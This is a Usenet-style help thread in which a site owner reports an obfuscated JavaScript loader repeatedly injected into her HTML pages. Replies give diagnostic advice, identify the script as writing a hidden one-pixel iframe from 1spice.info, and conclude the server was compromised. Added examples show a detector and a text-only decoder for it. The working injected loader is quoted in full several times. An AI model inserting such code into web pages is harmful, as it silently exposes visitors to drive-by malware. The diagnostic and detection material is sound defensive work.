#1

This JS keeps appearing in my html pages. I clean it out but it keeps reappearing. Any suggestions, much appreciated.

Kerry.

<script language="JavaScript">function ban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,45,23,3,40,25,24,44,34,43,0,0,0,0,0,0,1,18,52,28,12,32,37,39,21,30,51,22,11,29,9,7,38,46,59,56,53,55,36,62,5,4,10,0,0,0,0,27,0,2,33,19,6,49,50,47,20,54,60,35,61,8,13,58,26,42,57,17,16,48,0,14,41,15,31);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(174^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}ban('AIDfC0juLR6UCUjVd91iIc5E@W5UIzCJL3SevkCu@qMEwPleZ91ecWxkdgjeN_7icWxkM9lTagjV6zCUOJjeaz7i2cxeO97fL3DVAdSemJlJ3gDV')</script>

#2

On Jan 4, 10:04am, Kerry <ke...@capebyron.com> wrote:
> This JS keeps appearing in my html pages. I clean it out but it keeps
> reappearing. Any suggestions, much appreciated.

The first steps would be to:

(a) Check your system for malware (which you should do periodically as a general precaution). I tend towards AdAware from http://lavasoft.com/ (the free version is fine for this).

(b) Identify where the code is being inserted.

Is it just on the pages you produce? (View source on other pages and check).

Does it only appear on your computer? (View source on pages where you've seen the code from other computers).

Is it added by your editor? (Check the file in Notepad before uploading)

Is it added by your publishing process/software? (Change the publishing process)

Is it added by your host? (Try the page on a different hosting service)

Is it added by your browser / firewall? (Briefly disable firewalls and antivirus packages after making sure your software (especially your OS) is up to date with security patches).

Once you know when the code is being added to the pages, it will be easier to find out why, and to stop it.

--
David Dorward
http://blog.dorward.me.uk/ http://dorward.me.uk/
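
Step (b) in the post above comes down to finding the first stage at which the script is present in a page. A sketch of that check, as an added example that is not part of any post in the thread: the trait patterns, the function names and the sample pages are assumptions made here, and the injected script in the sample is a constructed stand-in, not a working payload.

```javascript
// Added example (not from the thread): find the first stage of a publishing
// pipeline at which a ban()-style injected script shows up in a page.

// Traits of the script quoted in this thread; a block must show all of them.
const TRAITS = [
  /document\.write\s*\(/,                  // writes markup into the page
  /String\.fromCharCode\s*\(\s*\d+\s*\^/,  // XOR-decodes each output byte
  /Array\s*\((?:\s*\d+\s*,){20,}/,         // long numeric lookup table
  /\(\s*'[^'\s<>]{40,}'\s*\)/,             // long opaque string argument
];

// Return the body of every <script> element that matches all traits.
function findInjected(html) {
  const hits = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/\s*script\s*>/gi;
  for (const m of html.matchAll(re)) {
    if (TRAITS.every((t) => t.test(m[1]))) hits.push(m[1]);
  }
  return hits;
}

// stages: ordered [name, html] pairs, for example the file saved by the
// editor, the file on the server, the page fetched from another computer.
function firstInfectedStage(stages) {
  for (const [name, html] of stages) {
    if (findInjected(html).length > 0) return name;
  }
  return null;
}

// Constructed stand-in with the same shape as the quoted script (the table
// and the argument are filler).
const INJECTED = '<script language="JavaScript">function ban(x){var t=Array(' +
  Array.from({ length: 75 }, (_, i) => i % 64).join(',') +
  ');document.write(String.fromCharCode(174^t[0]))}ban(\'' + 'A'.repeat(60) +
  '\')</script>';
// An ordinary document.write on its own is not flagged.
const CLEAN = '<html><body><script>document.write("hi")</script></body></html>';
const STAGES = [
  ['editor copy', CLEAN],
  ['file on server', CLEAN.replace('</body>', INJECTED + '</body>')],
  ['page as served', CLEAN.replace('</body>', INJECTED + '</body>')],
];
console.log(firstInfectedStage(STAGES));
```

A clean editor copy with an altered file on the server points at the server or the upload path rather than at the author's own machine.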

#3

Kerry wrote:
> This JS keeps appearing in my html pages. I clean it out but it keeps
> reappearing. Any suggestions, much appreciated.

URL?

Sometimes these things are added by your host, in which case a URL will help us verify that we can see this happening to your pages too. Perhaps some kind of advertising script, or some statistics gathering thing.

However, sometimes these things have been added by your own computer when you *view* the page -- in which case the URL will help us verify that we *don't* see the script on your pages. Some security software (Norton) adds this kind of stuff to all incoming web pages to block nastiness. Some viruses may do similar to increase the levels of nastiness.

Either way... URL?

--
Toby A Inkster BSc (Hons) ARCS
[Geek of HTML/SQL/Perl/PHP/Python/Apache/Linux]
[OS: Linux 2.6.17.14-mm-desktop-9mdvsmp, up 4 days, 23:10.]

Sharing Music with Apple iTunes
http://tobyinkster.co.uk/blog/2007/1...tunes-sharing/

#4

Kerry wrote:
> This JS keeps appearing in my html pages. I clean it out but it keeps
> reappearing. Any suggestions, much appreciated.
>
> Kerry.
>
> <script language="JavaScript">function ban(x){var
> l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,45,23,3,40,25,24,44,34,43,0,0,0,0,0,0,1,18,52,28,12,32,37,39,21,30,51,22,11,29,9,7,38,46,59,56,53,55,36,62,5,4,10,0,0,0,0,27,0,2,33,19,6,49,50,47,20,54,60,35,61,8,13,58,26,42,57,17,16,48,0,14,41,15,31);for(j=Math.ceil(l/
> b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p+
> +)-48])<<s;if(s){r+=String.fromCharCode(174^w&255);w>>=8;s-
> =2}else{s=6}}document.write(r)}}ban('AIDfC0juLR6UCUjVd91iIc5E@W5UIzCJL3SevkCu@qMEwPleZ91ecWxkdgjeN_7icWxkM9lTagjV6zCUOJjeaz7i2cxeO97fL3DVAdSemJlJ3gDV')</
> script>

This loads a 1 pixel wide IFRAME at 1spice.info/t

<URL: http://ddanchev.blogspot.com/2007/11...re-attack.html />

Jeff
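
The decoding that produces the markup described in the post above can be done on the script as text, without running it in a browser. The following is an added example, not part of any post in the thread; `SAMPLE` and `decodeInjected` are names chosen here, and the parser assumes the table, XOR constant and quoted argument appear in the shape the quoted script uses.

```javascript
// Added example (not from the thread): decode the injected ban() script as
// plain text. Nothing is evaluated and nothing is written to a page.

// The script as quoted in the thread, re-wrapped here with the same kind of
// stray spaces and line breaks that mail and forum wrapping left in it.
const SAMPLE = `<script language="JavaScript">function ban(x){var
l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,45, 23,3,40,25,24,44,34,43,0,0,
0,0,0,0,1,18,52,28,12,3 2,37,39,21,30,51,22,11,29,9,7,38,46,59,56,53,55,36 ,62,
5,4,10,0,0,0,0,27,0,2,33,19,6,49,50,47,20,54,6 0,35,61,8,13,58,26,42,57,17,16,
48,0,14,41,15,31);f or(j=Math.ceil(l/ b);j>0;j--){r='';for(i=Math.min(l,b);i>0;
i--,l--){w|=(t[x.charCodeAt(p+ +)-48])<<s;if(s){r+=String.fromCharCode(174^w&255)
;w>>=8 ;s- =2}else{s=6}}document.write(r)}}ban('AIDfC0juLR6UC UjVd91iIc5E@W5UIz
CJL3SevkCu@qMEwPleZ91ecWxkdgjeN_7 icWxkM9lTagjV6zCUOJjeaz7i2cxeO97fL3DVAdSemJl
J3gDV' )</ script>`;

function decodeInjected(source) {
  const flat = source.replace(/\s+/g, '');          // undo wrapping damage
  const table = /Array\(([\d,]+)\)/.exec(flat);     // 6-bit lookup table
  const key = /fromCharCode\((\d+)\^/.exec(flat);   // XOR constant
  const arg = /\('([^']+)'\)/.exec(flat);           // encoded argument
  if (!table || !key || !arg) throw new Error('not the ban() pattern');
  const t = table[1].split(',').map(Number);
  const k = Number(key[1]);
  let html = '', w = 0, s = 0;
  for (const ch of arg[1]) {
    const v = t[ch.charCodeAt(0) - 48];             // table is indexed from '0'
    if (v === undefined) throw new Error(`character outside table: ${ch}`);
    w |= v << s;                                    // append 6 bits
    if (s) { html += String.fromCharCode(k ^ (w & 255)); w >>= 8; s -= 2; }
    else s = 6;                                     // first of four: no byte yet
  }
  const src = /<iframe[^>]*\bsrc=["']?([^\s"'>]+)/i.exec(html);
  return { html, iframeSrc: src ? src[1] : null };
}

const result = decodeInjected(SAMPLE);
console.log(result.html);
console.log('iframe source:', result.iframeSrc);
```

Every four characters of the argument yield three bytes, so the scheme is a base64 variant with a shuffled alphabet and a one-byte XOR on top.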

#5

"Toby A Inkster" <usenet200712@tobyinkster.co.uk> wrote in message news:5pj155-c21.ln1@ophelia.g5n.co.uk...
> Kerry wrote:
>
>> This JS keeps appearing in my html pages. I clean it out but it keeps
>> reappearing. Any suggestions, much appreciated.
>
> URL?
>
> Sometimes these things are added by your host, in which case a URL will
> help us verify that we can see this happening to your pages too. Perhaps
> some kind of advertising script, or some statistics gathering thing.
>
> However, sometimes these things have been added by your own computer when
> you *view* the page -- in which case the URL will help us verify that we
> *don't* see the script on your pages. Some security software (Norton) adds
> this kind of stuff to all incoming web pages to block nastiness. Some
> viruses may do similar to increase the levels of nastiness.
>
> Either way... URL?
>
> --
> Toby A Inkster BSc (Hons) ARCS
> [Geek of HTML/SQL/Perl/PHP/Python/Apache/Linux]
> [OS: Linux 2.6.17.14-mm-desktop-9mdvsmp, up 4 days, 23:10.]
>
> Sharing Music with Apple iTunes
> http://tobyinkster.co.uk/blog/2007/1...tunes-sharing/

Hi, and thanks to everyone for the help.

The URL is http://www.inside-inspiration.com/

I have cleaned out all the malicious code except for one page I've kept as an example: http://www.inside-inspiration.com/default-backup.htm

Regards
Kerry

#6

On Jan 5, 3:57am, Jeff <jeff@spam_me_not.com> wrote:
> Kerry wrote:
> > This JS keeps appearing in my html pages. I clean it out but it keeps
> > reappearing. Any suggestions, much appreciated.
>
> > Kerry.
>
> > <script language="JavaScript">function ban(x){var
> > l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,45,23,3,40,25,24,44,34,43,0,0,0,0,0,0,1,18,52,28,12,32,37,39,21,30,51,22,11,29,9,7,38,46,59,56,53,55,36,62,5,4,10,0,0,0,0,27,0,2,33,19,6,49,50,47,20,54,60,35,61,8,13,58,26,42,57,17,16,48,0,14,41,15,31);for(j=Math.ceil(l/
> > b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p+
> > +)-48])<<s;if(s){r+=String.fromCharCode(174^w&255);w>>=8;s-
> > =2}else{s=6}}document.write(r)}}ban('AIDfC0juLR6UCUjVd91iIc5E@W5UIzCJL3SevkCu@qMEwPleZ91ecWxkdgjeN_7icWxkM9lTagjV6zCUOJjeaz7i2cxeO97fL3DVAdSemJlJ3gDV')</
> > script>
>
> This loads a 1 pixel wide IFRAME at 1spice.info/t
>
> <URL:http://ddanchev.blogspot.com/2007/11/another-massive-embedded-malware....>
>
> Jeff

"Jeff" <jeff@spam_me_not.com> wrote in message news:13nssrrtlghpi80@corp.supernews.com...
> Kerry wrote:
>> This JS keeps appearing in my html pages. I clean it out but it keeps
>> reappearing. Any suggestions, much appreciated.
>>
>> Kerry.
>>
>> <script language="JavaScript">function ban(x){var
>> l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,45,23,3,40,25,24,44,34,43,0,0,0,0,0,0,1,18,52,28,12,32,37,39,21,30,51,22,11,29,9,7,38,46,59,56,53,55,36,62,5,4,10,0,0,0,0,27,0,2,33,19,6,49,50,47,20,54,60,35,61,8,13,58,26,42,57,17,16,48,0,14,41,15,31);for(j=Math.ceil(l/
>> b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p+
>> +)-48])<<s;if(s){r+=String.fromCharCode(174^w&255);w>>=8;s-
>> =2}else{s=6}}document.write(r)}}ban('AIDfC0juLR6UCUjVd91iIc5E@W5UIzCJL3SevkCu@qMEwPleZ91ecWxkdgjeN_7icWxkM9lTagjV6zCUOJjeaz7i2cxeO97fL3DVAdSemJlJ3gDV')</
>> script>
>
> This loads a 1 pixel wide IFRAME at 1spice.info/t
>
> <URL:
> http://ddanchev.blogspot.com/2007/11...re-attack.html
> />
>
> Jeff

Thanks Jeff,

It's good to know I'm not alone with this problem.

I've done all the virus checks, changed the password on the server and checked carefully for other strange code or programs on the server but the code just keeps reappearing. I've contacted my host but there seems to be nothing they can do.

I'm lost as to how to solve the problem. Any more ideas on how to solve the problem are much appreciated.

Regards
Kerry

#7

On Fri, 04 Jan 2008 15:49:53 -0800, Kerry wrote:
> I've done all the virus checks, changed the password on the server and
> checked carefully for other strange code or programs on the server but
> the code just keeps reappearing. I've contacted my host but there seems
> to be nothing they can do.

Then they're clueless. The server has been hacked and they don't have the expertise to detect how it was done, or the interest in preventing it from happening again.

> I'm lost as to how to solve the problem. Any more ideas on how to solve
> the problem are much appreciated.

Find a better hosting company.

--
George Sexton
MH Software, Inc. - Home of Connect Daily Web Calendar
http://www.mhsoftware.com/connectdaily.htm

#8

Hi all,

I'm a graduate student studying JS malware. I have found the myspace worm. And thanks to Kerry, I now have another sample. Is there any other known malicious JS code?

Thank you!

Devin